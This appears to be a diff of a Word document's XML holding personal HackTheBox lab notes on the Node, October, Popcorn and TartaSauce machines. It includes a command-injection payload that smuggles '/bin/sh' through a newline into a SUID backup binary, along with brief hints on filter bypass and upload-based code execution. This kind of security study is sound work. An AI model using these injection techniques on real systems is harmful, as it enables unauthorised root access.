--- a/Notes/Training New.docx
+++ b/Notes/Training New.docx
@@ -21705,8 +21705,286 @@
           <w:u w:val="single"/>
           <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
-        <w:t xml:space="preserve">HacktheBox </w:t>
-      </w:r>
+        <w:t>HacktheBox Node (Linux)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Command filter bypass =&gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>? or *</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-in c programs, system() function executes all line as new command, so in order to inject command in program, we can just add a new line. A junk can be added to bypass 2&gt; /dev/null redirection </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>Example</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>/usr/local/bin/backup 1 a01a6aa5a44c003f8b12c5aec39bc508 "/tmp5714</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>aaa</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">or simply </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>/usr/local/bin/backup 1 a01a6aa5a44c003f8b12c5aec39bc508 "$(printf 'aaa\n/bin/sh')"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">here, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>/usr/local/bin/backup is a suid file and $(printf 'aaa\n/bin/sh') is going to be executed in c before being interpreted</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:before="0" w:after="283"/>
+        <w:jc w:val="center"/>
+        <w:rPr/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="StrongEmphasis"/>
@@ -21720,8 +21998,136 @@
           <w:u w:val="single"/>
           <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
-        <w:t>Node</w:t>
-      </w:r>
+        <w:t>HacktheBox October (Linux)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>Webapp enumeration</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">*Download two different version </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>*find . -type f -exec md5sum {} \;  | sed to make the base dir look same  |  uniq -c | sort | uniq -c | sort -rn</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="16" w:name="__DdeLink__2967_2688823153"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-CMS exploit: searchsploit on plugin, forum, blog </w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="16"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:before="0" w:after="283"/>
+        <w:jc w:val="center"/>
+        <w:rPr/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="StrongEmphasis"/>
@@ -21735,7 +22141,7 @@
           <w:u w:val="single"/>
           <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (Linux)</w:t>
+        <w:t>HacktheBox Popcorn (Linux)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -21764,22 +22170,80 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
-        <w:t xml:space="preserve">Command filter bypass =&gt; </w:t>
-      </w:r>
-      <w:r>
+        <w:t xml:space="preserve">Try remote code execution on image on profile </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:rPr>
           <w:rStyle w:val="StrongEmphasis"/>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
           <w:color w:val="auto"/>
           <w:kern w:val="2"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t>? or *</w:t>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:before="0" w:after="283"/>
+        <w:jc w:val="center"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="Calibri" w:cs="FreeSans" w:ascii="Carlito" w:hAnsi="Carlito"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">HacktheBox </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="Calibri" w:cs="FreeSans" w:ascii="Carlito" w:hAnsi="Carlito"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>TartaSauce</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="Calibri" w:cs="FreeSans" w:ascii="Carlito" w:hAnsi="Carlito"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (Linux)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -21799,14 +22263,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
-        <w:t xml:space="preserve">-in c programs, system() function executes all line as new command, so in order to inject command in program, we can just add a new line. A junk can be added to bypass 2&gt; /dev/null redirection </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
+        <w:t>-</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="StrongEmphasis"/>
@@ -21819,7 +22277,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
-        <w:t>Example</w:t>
+        <w:t>We can edit the response body / header in burpsuite so that the result change in output</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -21837,17 +22295,10 @@
           <w:kern w:val="2"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t>/usr/local/bin/backup 1 a01a6aa5a44c003f8b12c5aec39bc508 "/tmp5714</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="StrongEmphasis"/>
@@ -21858,17 +22309,10 @@
           <w:kern w:val="2"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t>/bin/bash</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>c</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="StrongEmphasis"/>
@@ -21879,17 +22323,10 @@
           <w:kern w:val="2"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t>aaa</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ompile c code in 64bit machine for 32 : </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="StrongEmphasis"/>
@@ -21903,7 +22340,7 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
-        <w:t>"</w:t>
+        <w:t>gcc -m32 file mycfile.c</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -21923,14 +22360,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
-        <w:t xml:space="preserve">or simply </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
+        <w:t>-if it falls, r</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="StrongEmphasis"/>
@@ -21943,26 +22374,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
-        <w:t>/usr/local/bin/backup 1 a01a6aa5a44c003f8b12c5aec39bc508 "$(printf 'aaa\n/bin/sh')"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">here, </w:t>
+        <w:t xml:space="preserve">un </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -21974,9 +22386,45 @@
           <w:kern w:val="2"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t>/usr/local/bin/backup is a suid file and $(printf 'aaa\n/bin/sh') is going to be executed in c before being interpreted</w:t>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>apt-get install gcc-multilib g++-multilib</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:tab/>
+        <w:tab/>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -22012,7 +22460,7 @@
     <w:qFormat/>
     <w:pPr>
       <w:widowControl/>
-      <w:overflowPunct w:val="true"/>
+      <w:overflowPunct w:val="false"/>
       <w:bidi w:val="0"/>
       <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
       <w:jc w:val="left"/>

--- a/Notes/Training New.docx
+++ b/Notes/Training New.docx
@@ -6,24 +6,36 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="center"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:ascii="Carlito" w:hAnsi="Carlito"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b/>
           <w:b/>
           <w:bCs/>
           <w:kern w:val="0"/>
           <w:u w:val="single"/>
           <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:ascii="Carlito" w:hAnsi="Carlito"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:u w:val="single"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
         <w:t>JOY</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -37,7 +49,12 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -53,7 +70,11 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="160"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -85,7 +106,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -144,17 +167,25 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="center"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:ascii="Carlito" w:hAnsi="Carlito"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b/>
           <w:b/>
           <w:bCs/>
           <w:kern w:val="0"/>
           <w:u w:val="single"/>
           <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:ascii="Carlito" w:hAnsi="Carlito"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:u w:val="single"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
         <w:t>DEVELOPMENT</w:t>
       </w:r>
     </w:p>
@@ -182,26 +213,32 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
           <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
-        <w:t>are so important. There is an exploit for example for slogin_lib.inc.php</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
           <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
+        <w:t>are so important. There is an exploit for example for slogin_lib.inc.php</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
